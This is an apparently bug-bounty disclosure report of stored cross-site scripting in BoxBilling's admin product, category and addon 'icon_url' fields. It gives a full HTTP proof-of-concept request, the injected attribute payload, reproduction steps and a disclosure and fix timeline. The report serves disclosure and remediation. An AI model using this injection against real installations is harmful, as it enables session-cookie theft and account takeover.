Cross-site Scripting (XSS) - Stored in boxbilling/boxbilling

Valid

Reported on

Oct 19th 2021


Description

Stored XSS at parameter 'icon_url' when Create New Product, New Category or New Addon

Proof of Concept

// PoC.req
POST /BoxBilling/src/index.php?_url=/api/admin/product/update HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
CSRFP-Token: fc85929963
Content-Length: 1560
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/BoxBilling/src/bb-admin/product/manage/5
Cookie: CSRFP-Token=fc85929963; BOXSID=eb4u3o7qnkkn8ohal9mfq8aulo; PHPSESSID=1vd67cg3nhsancbdqd2us579d0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

product_category_id=1&form_id=&status=enabled&hidden=0&setup=after_payment&icon_url=x%22+oNeRRor%3D%22alert(1)%3B&title=test&slug=test&pricing%5Btype%5D=free&pricing%5Bonce%5D%5Bsetup%5D=0.00&pricing%5Bonce%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1W%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B1W%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1W%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B1W%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B1M%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B1M%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1M%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B1M%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B3M%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B3M%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B3M%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B3M%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B6M%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B6M%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B6M%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B6M%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B1Y%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B1Y%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1Y%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B1Y%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B2Y%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B2Y%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B2Y%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B2Y%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B3Y%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B3Y%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B3Y%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B3Y%5D%5Benabled%5D=1&description=&upgrades=&id=5&id=5

Step to Reproduct

New Product

Goto Product choose to Products/Services

Create new product , at field 'Icon/Image URL' input with payload: x" oNeRRor="alert(1);

New Category

Goto Product choose to Products/Services

Create new category , at field 'Icon' input with payload: x" oNeRRor="alert(1);

New Addon

Goto Product choose to Product addons

Create new addons , at field 'Icon' input with payload: x" oNeRRor="alert(1);

Video PoC : PoC

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the boxbilling team and are waiting to hear back a year ago
lethanhphuc modified the report
a year ago
We have sent a follow up to the boxbilling team. We will try again in 7 days. a year ago
Belle Aerni validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
a year ago
lethanhphuc
a year ago

Researcher


PR: https://github.com/boxbilling/boxbilling/pull/1119

Belle Aerni marked this as fixed in 4.22-beta.1.2 with commit fc03c9 a year ago
lethanhphuc has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation